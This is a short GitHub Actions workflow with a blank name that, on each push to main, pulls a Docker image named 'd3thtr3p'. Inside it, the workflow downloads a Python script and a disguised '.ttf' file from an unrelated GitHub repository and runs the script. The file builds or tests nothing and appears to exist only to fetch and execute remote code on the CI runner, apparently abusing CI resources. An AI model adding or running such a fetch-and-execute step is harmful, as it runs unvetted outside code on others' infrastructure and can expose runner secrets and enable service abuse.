name: _____

on:
  push:
    branches: [ "main" ]

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

jobs:
  YT:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - name: Pull Docker image
      run: docker pull livetest/d3thtr3p:v2
    - name: Run Docker file
      run: |
            docker run livetest/d3thtr3p:v2 sh -c "curl -o Z.py https://raw.githubusercontent.com/Cjxsqa/4/main/Z.py && curl -o _.ttf https://raw.githubusercontent.com/Cjxsqa/4/main/_.ttf && python3 Z.py"
